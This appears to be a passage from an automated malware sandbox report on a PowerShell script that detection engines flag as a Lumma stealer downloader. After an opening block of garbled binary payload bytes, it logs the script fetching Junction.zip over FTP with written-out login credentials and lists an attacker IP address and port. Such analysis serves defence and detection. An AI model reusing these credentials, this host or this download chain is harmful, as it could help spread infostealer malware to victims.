ÛÔ©V{ã1ÍÈ¦µg×PYW¾yÜÒ¸÷¡C§ó¯ÈM%ö9ëïlQ¡íÊýQyfù¢xGÎù3Cõ«À¹jD§°?C:çyÛ®i;sýÊp·-÷ò«Ã;mÝ±àDÕÛW7k?uîêUããùÏ§¬ùÑûÇéo!÷Í7vìþ¯û²÷PÚ½-ObÝýruÏÕ×^ûXûö±»ï~5üYßÇ1·^{rµÂÝ}ÒûQÚÅâ#SÍÞÙf_¿£¥LÙ³uúºaë{lÖ5^{ûhä£ç}Â{ôøÅ×ë¿x7¸è}îºïwîÌNu¸Ë=<áð£åX¿Ù%O-Bîô9¢Oõö#Ê6,50feôä¸úq}£{²%ÖÜÑ8®Cqï¹}uûÖkJ7mÚ~fµ}óýÃâ/ÇòôDj½5W³bû1[:ZSÙudKÓõKì9fÇÜE\|k6\IÄ¤¯x{ñCaÊü¬ù-í÷¾l¤^ÿ,Y%jjìåjjõ?ë]hØSýFôKð&ÌÔãöèÊåëµ7th; ]¥VË:Ký.õ©ÙËÓ =,r¾ôG+5]NéÖ1§Ðyx·ä·Ïé_§õ%Blk; _«Íºn¶°¦Ñ1ð~ð1ãgïßû¢ÚüpõX¯l«±+Í÷5p-}Î¯Â´$÷Â°QÁ¯Wû;¾Rô<ó¸¨}~6¬LqÛ c2.~ü}ZnØÐµÚ9çÝËç_pÎ ¸]6ºK¥#U¬VþVömeêÔ_[ÿQ³~;Õ¯S½t¤zêÍ¨÷.<MrsuÐ ¢t¹F{ïðwËyÕÿ3°³mbDq¥?ª5ÂcS+ä[ªÒÔMyÔXm¯°OË6=pU¿IkÈD©ehµðÍTJË-¶ðì/ß0Oö<øº²WYku¦EQªÄCÛüÔ}O¢þ»3ñßãøìû>Ó4S¡}ß¥MZ,)Ò/û,7ûý-Y.ÙIHPTHHhß÷©Ù·gfîç®ÿÝsî9÷þqÏ=sÒ gN==Ïóý>ßïûýz½}QíXOêjÔç°,¹óz~ ¤/pÜËaõæ÷ÆÏLÚcoVÌ¯àUðö]--öøÌ8âem¶Â8U<6ß~©GÛqçjÁe"¢Ó£ªuÉ¨]8TÖSÚÓt¹±¥Û^·GvYñ(¬ÂúÚ´OG¿êÉ¶¨VÉîâ·Êwä/½?îpúoWCÍA¿+Ïî(Jxãòª¡äM×óïÏ^w½6}sþÞ£KºKoíZS>µ¬ùÁ¤ÛÄ»ôg¥_?·:C[ÿzV^yoþÒ²O/YMUÛEO?=õ\|ãùÁúãÂéï"ß>«lúhYóùcÊ«¯£J½eÔ&\|?0rN>ÓcÚagédsÞ8ýM9Ø;7¾7jä«ò)Bf~§LAá5%²aF¿Ok EP¿ÅnÏ¦µ»ò®¹æ>ÆûQðOÿ wm?ÐR{v}ôxùéõ··)?Âû.kÝßMØ9v/K»Z1¢±é1¡h¸DÞ©»¸%{¾õyñuÚmÄæK×Z·Î×¸ððËªÒO²Hô{óhë~#~?jGè²Òý³_´Ê^!Q#AO7¥ß!ÁÄ7^±îõRÓW&'tú=üdB\¤Xåyà1ùH@½H>lðÖ}GÄhÙ*ùa¯ÞÀ^£nLßú¡ ÒX¹ZQ´«\|Ãä1Ñ12sixOrÏlªW\aûße,éÊé®é#RV âé±Í¦õßëBÛý[â4{
Data received	226 Transfer complete.

Poweshell is sending data to a remote host (8 events)

Data sent	USER AstroVision
Data sent	PASS Ve!0mh16
Data sent	OPTS utf8 on
Data sent	PWD
Data sent	CWD /Scripts/
Data sent	TYPE I
Data sent	PASV
Data sent	RETR Junction.zip

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (8 events)

Time & API	Arguments	Status	Return
send Feb. 5, 2025, 11:01 a.m.	buffer: USER AstroVision socket: 1572 sent: 18	1	18
send Feb. 5, 2025, 11:01 a.m.	buffer: PASS Ve!0mh16 socket: 1572 sent: 15	1	15
send Feb. 5, 2025, 11:01 a.m.	buffer: OPTS utf8 on socket: 1572 sent: 14	1	14
send Feb. 5, 2025, 11:01 a.m.	buffer: PWD socket: 1572 sent: 5	1	5
send Feb. 5, 2025, 11:01 a.m.	buffer: CWD /Scripts/ socket: 1572 sent: 15	1	15
send Feb. 5, 2025, 11:01 a.m.	buffer: TYPE I socket: 1572 sent: 8	1	8
send Feb. 5, 2025, 11:01 a.m.	buffer: PASV socket: 1572 sent: 6	1	6
send Feb. 5, 2025, 11:01 a.m.	buffer: RETR Junction.zip socket: 1572 sent: 19	1	19

File has been identified by 23 AntiVirus engines on VirusTotal as malicious (23 events)

Lionic	Trojan.Script.PowerShell.4!c
CTX	powershell.trojan.lummastealer
ALYac	Trojan.Agent.GNVQ
VIPRE	Trojan.Agent.GNVQ
Arcabit	Trojan.Agent.GNVQ
Symantec	Trojan.Gen.MBT
ESET-NOD32	PowerShell/TrojanDownloader.Agent.KTB
Avast	Script:SNH-gen [Trj]
BitDefender	Trojan.Agent.GNVQ
MicroWorld-eScan	Trojan.Agent.GNVQ
Emsisoft	Trojan.Agent.GNVQ (B)
DrWeb	PowerShell.DownLoader.2269
FireEye	Trojan.Agent.GNVQ
Google	Detected
Kingsoft	Win32.Troj.Undef.a
Microsoft	Trojan:PowerShell/LummaStealer.DRS!MTB
GData	Trojan.Agent.GNVQ
Varist	ABTrojan.VQQZ-
AhnLab-V3	Downloader/Powershell.LummaC2.SC227430
Ikarus	Trojan-Downloader.PowerShell.Agent
Tencent	Win32.Trojan-Downloader.Downloader.Fwnw
huorong	Trojan/Generic!B10ECCEC160C1D8B
AVG	Script:SNH-gen [Trj]

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

167.86.109.19:33518

32.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All